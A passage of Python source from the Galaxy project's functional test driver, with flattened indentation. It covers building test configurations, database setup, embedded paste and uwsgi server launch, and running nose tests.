route-host: ^([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)-([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.(interactivetool\.$test_host:$test_port)$ goto:interactivetool
route-run: goto:endendend
route-label: interactivetool
route-host: ^([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)-([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.(interactivetool\.$test_host:$test_port)$ rpcvar:TARGET_HOST rtt_key_type_token_mapper_cached $1 $3 $2 $4 $0 5
route-if-not: empty:${TARGET_HOST} httpdumb:${TARGET_HOST}
route: .* break:404 Not Found
route-label: endendend
""")
DEFAULT_LOCALES = "en"
log = logging.getLogger("test_driver")
# Global variables to pass database contexts around - only needed for older
# Tool Shed twill tests that didn't utilize the API for such interactions.
galaxy_context = None
tool_shed_context = None
install_context = None
def setup_tool_shed_tmp_dir():
tool_shed_test_tmp_dir = os.environ.get('TOOL_SHED_TEST_TMP_DIR', None)
if tool_shed_test_tmp_dir is None:
tool_shed_test_tmp_dir = os.path.realpath(tempfile.mkdtemp())
# Here's the directory where everything happens. Temporary directories are created within this directory to contain
# the hgweb.config file, the database, new repositories, etc. Since the tool shed browses repository contents via HTTP,
    # the full path to the temporary directory where the repositories are located cannot contain invalid URL characters.
os.environ['TOOL_SHED_TEST_TMP_DIR'] = tool_shed_test_tmp_dir
return tool_shed_test_tmp_dir
def get_galaxy_test_tmp_dir():
"""Create test directory for use by Galaxy server being setup for testing."""
galaxy_test_tmp_dir = os.environ.get('GALAXY_TEST_TMP_DIR', None)
if galaxy_test_tmp_dir is None:
galaxy_test_tmp_dir = tempfile.mkdtemp()
return galaxy_test_tmp_dir
def configure_environment():
"""Hack up environment for test cases."""
# no op remove if unused
if 'HTTP_ACCEPT_LANGUAGE' not in os.environ:
os.environ['HTTP_ACCEPT_LANGUAGE'] = DEFAULT_LOCALES
# Used by get_filename in tool shed's twilltestcase.
if "TOOL_SHED_TEST_FILE_DIR" not in os.environ:
os.environ["TOOL_SHED_TEST_FILE_DIR"] = TOOL_SHED_TEST_DATA
os.environ["GALAXY_TEST_ENVIRONMENT_CONFIGURED"] = "1"
def build_logger():
"""Build a logger for test driver script."""
return log
def ensure_test_file_dir_set():
"""Ensure GALAXY_TEST_FILE_DIR setup in environment for test data resolver.
Return first directory for backward compat.
"""
galaxy_test_file_dir = os.environ.get('GALAXY_TEST_FILE_DIR', GALAXY_TEST_FILE_DIR)
os.environ['GALAXY_TEST_FILE_DIR'] = galaxy_test_file_dir
first_test_file_dir = galaxy_test_file_dir.split(",")[0]
return first_test_file_dir
def setup_galaxy_config(
tmpdir,
use_test_file_dir=False,
default_install_db_merged=True,
default_tool_data_table_config_path=None,
default_shed_tool_data_table_config=None,
default_job_config_file=None,
enable_tool_shed_check=False,
default_tool_conf=None,
shed_tool_conf=None,
datatypes_conf=None,
update_integrated_tool_panel=False,
prefer_template_database=False,
log_format=None,
conda_auto_init=False,
conda_auto_install=False,
use_shared_connection_for_amqp=False,
):
"""Setup environment and build config for test Galaxy instance."""
# For certain docker operations this needs to be evaluated out - e.g. for cwltool.
tmpdir = os.path.realpath(tmpdir)
if not os.path.exists(tmpdir):
os.makedirs(tmpdir)
template_cache_path = tempfile.mkdtemp(prefix='compiled_templates_', dir=tmpdir)
new_file_path = tempfile.mkdtemp(prefix='new_files_path_', dir=tmpdir)
job_working_directory = tempfile.mkdtemp(prefix='job_working_directory_', dir=tmpdir)
if use_test_file_dir:
first_test_file_dir = ensure_test_file_dir_set()
if not os.path.isabs(first_test_file_dir):
first_test_file_dir = os.path.join(galaxy_root, first_test_file_dir)
library_import_dir = first_test_file_dir
import_dir = os.path.join(first_test_file_dir, 'users')
if os.path.exists(import_dir):
user_library_import_dir = import_dir
else:
user_library_import_dir = None
else:
user_library_import_dir = None
library_import_dir = None
job_config_file = os.environ.get('GALAXY_TEST_JOB_CONFIG_FILE', default_job_config_file)
tool_path = os.environ.get('GALAXY_TEST_TOOL_PATH', 'tools')
tool_data_table_config_path = _tool_data_table_config_path(default_tool_data_table_config_path)
default_data_manager_config = None
for data_manager_config in ['config/data_manager_conf.xml', 'data_manager_conf.xml']:
if os.path.exists(data_manager_config):
default_data_manager_config = data_manager_config
data_manager_config_file = 'test/functional/tools/sample_data_manager_conf.xml'
if default_data_manager_config is not None:
data_manager_config_file = f"{default_data_manager_config},{data_manager_config_file}"
master_api_key = get_master_api_key()
cleanup_job = 'never' if ("GALAXY_TEST_NO_CLEANUP" in os.environ or
"TOOL_SHED_TEST_NO_CLEANUP" in os.environ) else 'onsuccess'
# Data Manager testing temp path
# For storing Data Manager outputs and .loc files so that real ones don't get clobbered
galaxy_data_manager_data_path = tempfile.mkdtemp(prefix='data_manager_tool-data', dir=tmpdir)
tool_conf = os.environ.get('GALAXY_TEST_TOOL_CONF', default_tool_conf)
conda_auto_install = os.environ.get('GALAXY_TEST_CONDA_AUTO_INSTALL', conda_auto_install)
conda_auto_init = os.environ.get('GALAXY_TEST_CONDA_AUTO_INIT', conda_auto_init)
conda_prefix = os.environ.get('GALAXY_TEST_CONDA_PREFIX')
if tool_conf is None:
# As a fallback always at least allow upload.
tool_conf = FRAMEWORK_UPLOAD_TOOL_CONF
if shed_tool_conf is not None:
tool_conf = f"{tool_conf},{shed_tool_conf}"
# Resolve these paths w.r.t. galaxy root; otherwise galaxy's config system will resolve them w.r.t.
# their parent directories, as per schema.
data_manager_config_file = _resolve_relative_config_paths(data_manager_config_file)
tool_config_file = _resolve_relative_config_paths(tool_conf)
tool_data_table_config_path = _resolve_relative_config_paths(tool_data_table_config_path)
config = dict(
admin_users='test@bx.psu.edu',
allow_library_path_paste=True,
allow_user_creation=True,
allow_user_deletion=True,
api_allow_run_as='test@bx.psu.edu',
auto_configure_logging=logging_config_file is None,
check_migrate_tools=False,
chunk_upload_size=100,
conda_prefix=conda_prefix,
conda_auto_init=conda_auto_init,
conda_auto_install=conda_auto_install,
cleanup_job=cleanup_job,
retry_metadata_internally=False,
data_dir=tmpdir,
data_manager_config_file=data_manager_config_file,
enable_beta_tool_formats=True,
expose_dataset_path=True,
ftp_upload_purge=False,
galaxy_data_manager_data_path=galaxy_data_manager_data_path,
id_secret='changethisinproductiontoo',
job_config_file=job_config_file,
job_working_directory=job_working_directory,
library_import_dir=library_import_dir,
log_destination="stdout",
new_file_path=new_file_path,
override_tempdir=False,
master_api_key=master_api_key,
running_functional_tests=True,
template_cache_path=template_cache_path,
template_path='templates',
tool_config_file=tool_config_file,
tool_data_table_config_path=tool_data_table_config_path,
tool_parse_help=False,
tool_path=tool_path,
update_integrated_tool_panel=update_integrated_tool_panel,
use_tasked_jobs=True,
use_heartbeat=False,
user_library_import_dir=user_library_import_dir,
webhooks_dir=TEST_WEBHOOKS_DIR,
logging=LOGGING_CONFIG_DEFAULT,
monitor_thread_join_timeout=5,
object_store_store_by="uuid",
simplified_workflow_run_ui="off",
)
if default_shed_tool_data_table_config:
config["shed_tool_data_table_config"] = default_shed_tool_data_table_config
if not use_shared_connection_for_amqp:
config["amqp_internal_connection"] = "sqlalchemy+sqlite:///%s?isolation_level=IMMEDIATE" % os.path.join(tmpdir, "control.sqlite")
config.update(database_conf(tmpdir, prefer_template_database=prefer_template_database))
config.update(install_database_conf(tmpdir, default_merged=default_install_db_merged))
if asbool(os.environ.get("GALAXY_TEST_USE_HIERARCHICAL_OBJECT_STORE")):
object_store_config = os.path.join(tmpdir, "object_store_conf.yml")
with open(object_store_config, "w") as f:
contents = """
type: hierarchical
backends:
- id: files1
type: disk
weight: 1
files_dir: "${temp_directory}/files1"
extra_dirs:
- type: temp
path: "${temp_directory}/tmp1"
- type: job_work
path: "${temp_directory}/job_working_directory1"
- id: files2
type: disk
weight: 1
files_dir: "${temp_directory}/files2"
extra_dirs:
- type: temp
path: "${temp_directory}/tmp2"
- type: job_work
path: "${temp_directory}/job_working_directory2"
"""
contents_template = string.Template(contents)
expanded_contents = contents_template.safe_substitute(temp_directory=tmpdir)
f.write(expanded_contents)
config["object_store_config_file"] = object_store_config
if datatypes_conf is not None:
config['datatypes_config_file'] = datatypes_conf
if enable_tool_shed_check:
config["enable_tool_shed_check"] = enable_tool_shed_check
config["hours_between_check"] = 0.001
tool_dependency_dir = os.environ.get('GALAXY_TOOL_DEPENDENCY_DIR')
if tool_dependency_dir:
config["tool_dependency_dir"] = tool_dependency_dir
# Used by shed's twill dependency stuff
# TODO: read from Galaxy's config API.
os.environ["GALAXY_TEST_TOOL_DEPENDENCY_DIR"] = tool_dependency_dir or os.path.join(tmpdir, 'dependencies')
return config
def _resolve_relative_config_paths(config_option):
# If option is not None, split into paths, resolve each w.r.t. root, then rebuild as csv string.
if config_option is not None:
resolved = []
for path in config_option.split(','):
resolved.append(os.path.join(galaxy_root, path.strip()))
return ','.join(resolved)
def _tool_data_table_config_path(default_tool_data_table_config_path=None):
tool_data_table_config_path = os.environ.get('GALAXY_TEST_TOOL_DATA_TABLE_CONF', default_tool_data_table_config_path)
if tool_data_table_config_path is None:
        # ... otherwise find whatever Galaxy would use as the default and append
        # the sample data tables used by the functional tests to it.
default_tool_data_config = 'lib/galaxy/config/sample/tool_data_table_conf.xml.sample'
for tool_data_config in ['config/tool_data_table_conf.xml', 'tool_data_table_conf.xml']:
if os.path.exists(tool_data_config):
default_tool_data_config = tool_data_config
test_tool_data_config = 'test/functional/tool-data/sample_tool_data_tables.xml'
tool_data_table_config_path = f'{default_tool_data_config},{test_tool_data_config}'
return tool_data_table_config_path
def nose_config_and_run(argv=None, env=None, ignore_files=None, plugins=None):
"""Setup a nose context and run tests.
Tests are specified by argv (defaulting to sys.argv).
"""
if env is None:
env = os.environ
if ignore_files is None:
ignore_files = []
if plugins is None:
plugins = nose.plugins.manager.DefaultPluginManager()
if argv is None:
argv = sys.argv
test_config = nose.config.Config(
env=os.environ,
ignoreFiles=ignore_files,
plugins=plugins,
)
# Add custom plugin to produce JSON data used by planemo.
test_config.plugins.addPlugin(StructuredTestDataPlugin())
test_config.configure(argv)
result = run(test_config)
success = result.wasSuccessful()
return success
def copy_database_template(source, db_path):
"""Copy a 'clean' sqlite template database.
From file or URL to specified path for sqlite database.
"""
db_path_dir = os.path.dirname(db_path)
if not os.path.exists(db_path_dir):
os.makedirs(db_path_dir)
if os.path.exists(source):
shutil.copy(source, db_path)
assert os.path.exists(db_path)
elif source.lower().startswith(("http://", "https://", "ftp://")):
try:
download_to_file(source, db_path)
except Exception as e:
# We log the exception but don't fail startup, since we can
# do all migration steps instead of downloading a template.
log.exception(e)
else:
raise Exception("Failed to copy database template from source %s" % source)
def database_conf(db_path, prefix="GALAXY", prefer_template_database=False):
"""Find (and populate if needed) Galaxy database connection."""
database_auto_migrate = False
check_migrate_databases = True
dburi_var = "%s_TEST_DBURI" % prefix
template_name = None
if dburi_var in os.environ:
database_connection = os.environ[dburi_var]
# only template if postgres - not mysql or sqlite
do_template = prefer_template_database and database_connection.startswith("p")
if do_template:
database_template_parsed = urlparse(database_connection)
template_name = database_template_parsed.path[1:] # drop / from /galaxy
actual_db = "gxtest" + ''.join(random.choice(string.ascii_uppercase) for _ in range(10))
actual_database_parsed = database_template_parsed._replace(path="/%s" % actual_db)
database_connection = actual_database_parsed.geturl()
if not database_exists(database_connection):
                # Skip migrations and create the current tables directly
create_database(database_connection)
mapping.init('/tmp', database_connection, create_tables=True, map_install_models=True)
toolshed_mapping.init(database_connection, create_tables=True)
check_migrate_databases = False
else:
default_db_filename = "%s.sqlite" % prefix.lower()
template_var = "%s_TEST_DB_TEMPLATE" % prefix
db_path = os.path.join(db_path, default_db_filename)
if template_var in os.environ:
# Middle ground between recreating a completely new
# database and pointing at existing database with
# GALAXY_TEST_DBURI. The former requires a lot of setup
# time, the latter results in test failures in certain
# cases (namely tool shed tests expecting clean database).
copy_database_template(os.environ[template_var], db_path)
database_auto_migrate = True
database_connection = 'sqlite:///%s' % db_path
config = {
"check_migrate_databases": check_migrate_databases,
"database_connection": database_connection,
"database_auto_migrate": database_auto_migrate
}
if not database_connection.startswith("sqlite://"):
config["database_engine_option_max_overflow"] = "20"
config["database_engine_option_pool_size"] = "10"
if template_name:
config["database_template"] = template_name
return config
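# A minimal usage sketch for database_conf(), assuming a local Postgres instance
# is available (the connection string and paths below are illustrative only):
#
#     os.environ["GALAXY_TEST_DBURI"] = "postgresql://user:pass@localhost/galaxy_test"
#     conf = database_conf("/tmp/test_dbs", prefer_template_database=True)
#     # conf["database_connection"] now points at a freshly created, randomly
#     # named "gxtest..." database and conf["database_template"] records the
#     # template database it was derived from.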
def install_database_conf(db_path, default_merged=False):
if 'GALAXY_TEST_INSTALL_DBURI' in os.environ:
install_galaxy_database_connection = os.environ['GALAXY_TEST_INSTALL_DBURI']
elif asbool(os.environ.get('GALAXY_TEST_INSTALL_DB_MERGED', default_merged)):
install_galaxy_database_connection = None
else:
install_galaxy_db_path = os.path.join(db_path, 'install.sqlite')
install_galaxy_database_connection = 'sqlite:///%s' % install_galaxy_db_path
conf = {}
if install_galaxy_database_connection is not None:
conf["install_database_connection"] = install_galaxy_database_connection
return conf
def database_files_path(test_tmpdir, prefix="GALAXY"):
"""Create a mock database/ directory like in GALAXY_ROOT.
Use prefix to default this if TOOL_SHED_TEST_DBPATH or
GALAXY_TEST_DBPATH is set in the environment.
"""
environ_var = "%s_TEST_DBPATH" % prefix
if environ_var in os.environ:
db_path = os.environ[environ_var]
else:
tempdir = tempfile.mkdtemp(dir=test_tmpdir)
db_path = os.path.join(tempdir, 'database')
return db_path
def _get_static_settings():
"""Configuration required for Galaxy static middleware.
Returns dictionary of the settings necessary for a galaxy App
to be wrapped in the static middleware.
This mainly consists of the filesystem locations of url-mapped
static resources.
"""
static_dir = os.path.join(galaxy_root, "static")
# TODO: these should be copied from config/galaxy.ini
return dict(
static_enabled=True,
static_cache_time=360,
static_dir=static_dir,
static_images_dir=os.path.join(static_dir, 'images', ''),
static_favicon_dir=os.path.join(static_dir, 'favicon.ico'),
static_scripts_dir=os.path.join(static_dir, 'scripts', ''),
static_style_dir=os.path.join(static_dir, 'style'),
static_robots_txt=os.path.join(static_dir, 'robots.txt'),
)
def get_webapp_global_conf():
"""Get the global_conf dictionary sent to ``app_factory``."""
# (was originally sent 'dict()') - nothing here for now except static settings
global_conf = dict()
global_conf.update(_get_static_settings())
return global_conf
def wait_for_http_server(host, port, sleep_amount=0.1, sleep_tries=150):
"""Wait for an HTTP server to boot up."""
# Test if the server is up
for _ in range(sleep_tries):
# directly test the app, not the proxy
conn = http.client.HTTPConnection(host, port)
try:
conn.request("GET", "/")
response = conn.getresponse()
if response.status == 200:
break
except OSError as e:
if e.errno not in [61, 111]:
raise
time.sleep(sleep_amount)
else:
        template = "Test HTTP server on host %s and port %s did not return '200 OK' after %d tries"
        message = template % (host, port, sleep_tries)
raise Exception(message)
def attempt_ports(port):
if port is not None:
yield port
raise Exception("An existing process seems bound to specified test server port [%s]" % port)
else:
random.seed()
for _ in range(0, 9):
port = str(random.randint(8000, 10000))
yield port
raise Exception("Unable to open a port between {} and {} to start Galaxy server".format(8000, 10000))
def serve_webapp(webapp, port=None, host=None):
"""Serve the webapp on a recommend port or a free one.
Return the port the webapp is running on.
"""
server = None
for port in attempt_ports(port):
try:
server = httpserver.serve(webapp, host=host, port=port, start_loop=False)
break
except OSError as e:
if e.errno == 98:
continue
raise
t = threading.Thread(target=server.serve_forever)
t.start()
return server, port
def cleanup_directory(tempdir):
"""Clean up temporary files used by test unless GALAXY_TEST_NO_CLEANUP is set.
Also respect TOOL_SHED_TEST_NO_CLEANUP for legacy reasons.
"""
skip_cleanup = "GALAXY_TEST_NO_CLEANUP" in os.environ or "TOOL_SHED_TEST_NO_CLEANUP" in os.environ
if skip_cleanup:
log.info("GALAXY_TEST_NO_CLEANUP is on. Temporary files in %s" % tempdir)
return
try:
if os.path.exists(tempdir) and not skip_cleanup:
shutil.rmtree(tempdir)
except Exception:
pass
def setup_shed_tools_for_test(app, tmpdir, testing_migrated_tools, testing_installed_tools):
"""Modify Galaxy app's toolbox for migrated or installed tool tests."""
if testing_installed_tools:
# TODO: Do this without modifying app - that is a pretty violation
# of Galaxy's abstraction - we shouldn't require app at all let alone
# be modifying it.
tool_configs = app.config.tool_configs
# Eliminate the migrated_tool_panel_config from the app's tool_configs, append the list of installed_tool_panel_configs,
# and reload the app's toolbox.
relative_migrated_tool_panel_config = os.path.join(app.config.root, MIGRATED_TOOL_PANEL_CONFIG)
if relative_migrated_tool_panel_config in tool_configs:
tool_configs.remove(relative_migrated_tool_panel_config)
for installed_tool_panel_config in INSTALLED_TOOL_PANEL_CONFIGS:
tool_configs.append(installed_tool_panel_config)
from galaxy import tools # delay import because this brings in so many modules for small tests # noqa: E402
app.toolbox = tools.ToolBox(tool_configs, app.config.tool_path, app)
def build_galaxy_app(simple_kwargs):
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary and use load_app_properties so
Galaxy override variables are respected. Also setup "global" references
to sqlalchemy database context for Galaxy and install databases.
"""
log.info("Galaxy database connection: %s", simple_kwargs["database_connection"])
simple_kwargs['global_conf'] = get_webapp_global_conf()
simple_kwargs['global_conf']['__file__'] = "lib/galaxy/config/sample/galaxy.yml.sample"
simple_kwargs = load_app_properties(
kwds=simple_kwargs
)
# Build the Universe Application
app = GalaxyUniverseApplication(**simple_kwargs)
log.info("Embedded Galaxy application started")
global galaxy_context
global install_context
galaxy_context = app.model.context
install_context = app.install_model.context
    # Toolbox indexing now happens out of band via the work queue and, beyond
    # potentially running asynchronously after tests execute, it does not run at
    # all without building a uwsgi app (app.is_webapp = False for this test kit).
    # We therefore build an index for the test Galaxy app explicitly -- this is
    # pretty fast with the limited toolset.
app.reindex_tool_search()
return app
def build_shed_app(simple_kwargs):
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary. Also setup "global" reference
to sqlalchemy database context for tool shed database.
"""
log.info("Tool shed database connection: %s", simple_kwargs["database_connection"])
# TODO: Simplify global_conf to match Galaxy above...
simple_kwargs['__file__'] = 'tool_shed_wsgi.yml.sample'
simple_kwargs['global_conf'] = get_webapp_global_conf()
app = ToolshedUniverseApplication(**simple_kwargs)
log.info("Embedded Toolshed application started")
global tool_shed_context
tool_shed_context = app.model.context
return app
def explicitly_configured_host_and_port(prefix, config_object):
host_env_key = "%s_TEST_HOST" % prefix
port_env_key = "%s_TEST_PORT" % prefix
port_random_env_key = "%s_TEST_PORT_RANDOM" % prefix
default_web_host = getattr(config_object, "default_web_host", DEFAULT_WEB_HOST)
host = os.environ.get(host_env_key, default_web_host)
if os.environ.get(port_random_env_key, None) is not None:
        # Ignore the port environment variable, it wasn't explicitly configured.
port = None
else:
port = os.environ.get(port_env_key, None)
# If an explicit port wasn't assigned for this test or test case, set this
# environment variable so we know it is random. We can then randomly re-assign
# for new tests.
if port is None:
os.environ["GALAXY_TEST_PORT_RANDOM"] = "1"
return host, port
def set_and_wait_for_http_target(prefix, host, port, sleep_amount=0.1, sleep_tries=150):
host_env_key = "%s_TEST_HOST" % prefix
port_env_key = "%s_TEST_PORT" % prefix
os.environ[host_env_key] = host
os.environ[port_env_key] = port
wait_for_http_server(host, port, sleep_amount=sleep_amount, sleep_tries=sleep_tries)
class ServerWrapper:
def __init__(self, name, host, port):
self.name = name
self.host = host
self.port = port
@property
def app(self):
raise NotImplementedError("Test can be run against target - requires a Galaxy app object.")
def stop(self):
raise NotImplementedError()
class PasteServerWrapper(ServerWrapper):
def __init__(self, app, server, name, host, port):
super().__init__(name, host, port)
self._app = app
self._server = server
@property
def app(self):
return self._app
def stop(self):
if self._server is not None:
log.info("Shutting down embedded %s web server" % self.name)
self._server.server_close()
log.info("Embedded web server %s stopped" % self.name)
if self._app is not None:
log.info("Stopping application %s" % self.name)
self._app.shutdown()
log.info("Application %s stopped." % self.name)
class UwsgiServerWrapper(ServerWrapper):
def __init__(self, p, name, host, port):
super().__init__(name, host, port)
self._p = p
self._r = None
self._t = threading.Thread(target=self.wait)
self._t.start()
def __del__(self):
self._t.join()
def wait(self):
self._r = self._p.wait()
def stop(self):
try:
os.killpg(os.getpgid(self._p.pid), signal.SIGTERM)
except Exception:
pass
time.sleep(.1)
try:
os.killpg(os.getpgid(self._p.pid), signal.SIGKILL)
except Exception:
pass
self._t.join()
def launch_uwsgi(kwargs, tempdir, prefix=DEFAULT_CONFIG_PREFIX, config_object=None):
name = prefix.lower()
host, port = explicitly_configured_host_and_port(prefix, config_object)
config = {}
config["galaxy"] = kwargs.copy()
enable_realtime_mapping = getattr(config_object, "enable_realtime_mapping", False)
if enable_realtime_mapping:
interactive_tool_defaults = {
"interactivetools_prefix": "interactivetool",
"interactivetools_map": os.path.join(tempdir, "interactivetools_map.sqlite"),
"interactivetools_enable": True
}
for key, value in interactive_tool_defaults.items():
if key not in config["galaxy"]:
config["galaxy"][key] = value
yaml_config_path = os.path.join(tempdir, "galaxy.yml")
with open(yaml_config_path, "w") as f:
yaml.dump(config, f)
if enable_realtime_mapping:
# Avoid YAML.dump configuration since uwsgi doesn't like real YAML :( -
# though maybe it would work?
with open(yaml_config_path) as f:
old_contents = f.read()
with open(yaml_config_path, "w") as f:
test_port = str(port) if port else r"[0-9]+"
test_host = re.escape(host) if host else "localhost"
uwsgi_section = REALTIME_PROXY_TEMPLATE.safe_substitute(test_host=test_host, test_port=test_port, tempdir=tempdir)
f.write(uwsgi_section)
f.write(old_contents)
def attempt_port_bind(port):
uwsgi_command = [
"uwsgi",
"--http",
f"{host}:{port}",
"--yaml",
yaml_config_path,
"--module",
"galaxy.webapps.galaxy.buildapp:uwsgi_app_factory()",
"--enable-threads",
"--die-on-term",
]
for p in sys.path:
uwsgi_command.append('--pythonpath')
uwsgi_command.append(p)
handle_uwsgi_cli_command = getattr(
config_object, "handle_uwsgi_cli_command", None
)
if handle_uwsgi_cli_command is not None:
handle_uwsgi_cli_command(uwsgi_command)
# we don't want to quote every argument but we don't want to print unquoted ones either, so do this
log.info("Starting uwsgi with command line: %s", ' '.join(shlex.quote(x) for x in uwsgi_command))
p = subprocess.Popen(
uwsgi_command,
cwd=galaxy_root,
preexec_fn=os.setsid,
)
return UwsgiServerWrapper(
p, name, host, port
)
for port in attempt_ports(port):
server_wrapper = attempt_port_bind(port)
try:
set_and_wait_for_http_target(prefix, host, port, sleep_tries=50)
log.info(f"Test-managed uwsgi web server for {name} started at {host}:{port}")
return server_wrapper
except Exception:
server_wrapper.stop()
def launch_server(app, webapp_factory, kwargs, prefix=DEFAULT_CONFIG_PREFIX, config_object=None):
"""Launch a web server for a given app using supplied factory.
Consistently read either GALAXY_TEST_HOST and GALAXY_TEST_PORT or
TOOL_SHED_TEST_HOST and TOOL_SHED_TEST_PORT and ensure these are
all set after this method has been called.
"""
name = prefix.lower()
host, port = explicitly_configured_host_and_port(prefix, config_object)
webapp = webapp_factory(
kwargs['global_conf'],
app=app,
use_translogger=False,
static_enabled=True,
register_shutdown_at_exit=False
)
server, port = serve_webapp(
webapp,
host=host, port=port
)
set_and_wait_for_http_target(prefix, host, port)
log.info(f"Embedded paste web server for {name} started at {host}:{port}")
return PasteServerWrapper(
app, server, name, host, port
)
class TestDriver:
"""Responsible for the life-cycle of a Galaxy-style functional test.
Sets up servers, configures tests, runs nose, and tears things
down. This is somewhat like a Python TestCase - but different
because it is meant to provide a main() endpoint.
"""
def __init__(self):
"""Setup tracked resources."""
self.server_wrappers = []
self.temp_directories = []
def setup(self):
"""Called before tests are built."""
def build_tests(self):
"""After environment is setup, setup nose tests."""
def tear_down(self):
"""Cleanup resources tracked by this object."""
self.stop_servers()
for temp_directory in self.temp_directories:
cleanup_directory(temp_directory)
def stop_servers(self):
for server_wrapper in self.server_wrappers:
server_wrapper.stop()
self.server_wrappers = []
def mkdtemp(self):
"""Return a temp directory that is properly cleaned up or not based on the config."""
temp_directory = tempfile.mkdtemp()
self.temp_directories.append(temp_directory)
return temp_directory
def run(self):
"""Driver whole test.
Setup environment, build tests (if needed), run test,
and finally cleanup resources.
"""
configure_environment()
self.setup()
self.build_tests()
try:
success = nose_config_and_run()
return 0 if success else 1
except Exception as e:
log.info("Failure running tests")
raise e
finally:
log.info("Shutting down")
self.tear_down()
class GalaxyTestDriver(TestDriver):
"""Instantial a Galaxy-style nose TestDriver for testing Galaxy."""
testing_shed_tools = False
def _configure(self, config_object=None):
"""Setup various variables used to launch a Galaxy server."""
config_object = self._ensure_config_object(config_object)
self.external_galaxy = os.environ.get('GALAXY_TEST_EXTERNAL', None)
# Allow a particular test to force uwsgi or any test to use uwsgi with
# the GALAXY_TEST_UWSGI environment variable.
use_uwsgi = os.environ.get('GALAXY_TEST_UWSGI', None)
if not use_uwsgi:
if getattr(config_object, "require_uwsgi", None):
use_uwsgi = True
self.use_uwsgi = use_uwsgi
# Allow controlling the log format
log_format = os.environ.get('GALAXY_TEST_LOG_FORMAT', None)
if not log_format and use_uwsgi:
log_format = "%(name)s %(levelname)-5.5s %(asctime)s " \
"[p:%(process)s,w:%(worker_id)s,m:%(mule_id)s] " \
"[%(threadName)s] %(message)s"
self.log_format = log_format
self.galaxy_test_tmp_dir = get_galaxy_test_tmp_dir()
self.temp_directories.append(self.galaxy_test_tmp_dir)
self.testing_shed_tools = getattr(config_object, "testing_shed_tools", False)
if getattr(config_object, "framework_tool_and_types", False):
default_tool_conf = FRAMEWORK_SAMPLE_TOOLS_CONF
datatypes_conf_override = FRAMEWORK_DATATYPES_CONF
else:
default_tool_conf = getattr(config_object, "default_tool_conf", None)
datatypes_conf_override = getattr(config_object, "datatypes_conf_override", None)
self.default_tool_conf = default_tool_conf
self.datatypes_conf_override = datatypes_conf_override
def setup(self, config_object=None):
"""Setup a Galaxy server for functional test (if needed).
Configuration options can be specified as attributes on the supplied
```config_object``` (defaults to self).
"""
self._saved_galaxy_config = None
self._configure(config_object)
self._register_and_run_servers(config_object)
def restart(self, config_object=None, handle_config=None):
self.stop_servers()
self._register_and_run_servers(config_object, handle_config=handle_config)
def _register_and_run_servers(self, config_object=None, handle_config=None):
config_object = self._ensure_config_object(config_object)
self.app = None
if self.external_galaxy is None:
if self._saved_galaxy_config is not None:
galaxy_config = self._saved_galaxy_config
else:
tempdir = tempfile.mkdtemp(dir=self.galaxy_test_tmp_dir)
# Configure the database path.
galaxy_db_path = database_files_path(tempdir)
# Allow config object to specify a config dict or a method to produce
                # one - otherwise just read the properties above and use the default
# implementation from this file.
galaxy_config = getattr(config_object, "galaxy_config", None)
if callable(galaxy_config):
galaxy_config = galaxy_config()
if galaxy_config is None:
setup_galaxy_config_kwds = dict(
use_test_file_dir=not self.testing_shed_tools,
default_install_db_merged=True,
default_tool_conf=self.default_tool_conf,
datatypes_conf=self.datatypes_conf_override,
prefer_template_database=getattr(config_object, "prefer_template_database", False),
log_format=self.log_format,
conda_auto_init=getattr(config_object, "conda_auto_init", False),
conda_auto_install=getattr(config_object, "conda_auto_install", False),
use_shared_connection_for_amqp=getattr(config_object, "use_shared_connection_for_amqp", False)
)
galaxy_config = setup_galaxy_config(
galaxy_db_path,
**setup_galaxy_config_kwds
)
isolate_galaxy_config = getattr(config_object, "isolate_galaxy_config", False)
if isolate_galaxy_config:
galaxy_config["config_dir"] = tempdir
self._saved_galaxy_config = galaxy_config
if galaxy_config is not None:
handle_galaxy_config_kwds = handle_config or getattr(
config_object, "handle_galaxy_config_kwds", None
)
if handle_galaxy_config_kwds is not None:
handle_galaxy_config_kwds(galaxy_config)
if self.use_uwsgi:
server_wrapper = launch_uwsgi(
galaxy_config,
tempdir=tempdir,
config_object=config_object,
)
else:
# ---- Build Application --------------------------------------------------
self.app = build_galaxy_app(galaxy_config)
server_wrapper = launch_server(
self.app,
buildapp.app_factory,
galaxy_config,
config_object=config_object,
)
log.info(f"Functional tests will be run against external Galaxy server {server_wrapper.host}:{server_wrapper.port}")
self.server_wrappers.append(server_wrapper)
else:
log.info("Functional tests will be run against test managed Galaxy server %s" % self.external_galaxy)
# Ensure test file directory setup even though galaxy config isn't built.
ensure_test_file_dir_set()
def _ensure_config_object(self, config_object):
if config_object is None:
config_object = self
return config_object
def setup_shed_tools(self, testing_migrated_tools=False, testing_installed_tools=True):
setup_shed_tools_for_test(
self.app,
self.galaxy_test_tmp_dir,
testing_migrated_tools,
testing_installed_tools
)
def build_tool_tests(self, testing_shed_tools=None, return_test_classes=False):
if self.app is None:
return
if testing_shed_tools is None:
testing_shed_tools = getattr(self, "testing_shed_tools", False)
# We must make sure that functional.test_toolbox is always imported after
# database_contexts.galaxy_content is set (which occurs in this method above).
# If functional.test_toolbox is imported before database_contexts.galaxy_content
# is set, sa_session will be None in all methods that use it.
import functional.test_toolbox
functional.test_toolbox.toolbox = self.app.toolbox
# When testing data managers, do not test toolbox.
test_classes = functional.test_toolbox.build_tests(
app=self.app,
testing_shed_tools=testing_shed_tools,
master_api_key=get_master_api_key(),
user_api_key=get_user_api_key(),
)
if return_test_classes:
return test_classes
return functional.test_toolbox
def run_tool_test(self, tool_id, index=0, resource_parameters=None, **kwd):
if resource_parameters is None:
resource_parameters = {}
host, port, url = target_url_parts()
galaxy_interactor_kwds = {
"galaxy_url": url,
"master_api_key": get_master_api_key(),
"api_key": get_user_api_key(),
"keep_outputs_dir": None,
}
galaxy_interactor = GalaxyInteractorApi(**galaxy_interactor_kwds)
verify_tool(
tool_id=tool_id,
test_index=index,
galaxy_interactor=galaxy_interactor,
resource_parameters=resource_parameters,
**kwd
)
def drive_test(test_driver_class):
"""Instantiate driver class, run, and exit appropriately."""
test_driver = test_driver_class()
sys.exit(test_driver.run())
__all__ = (
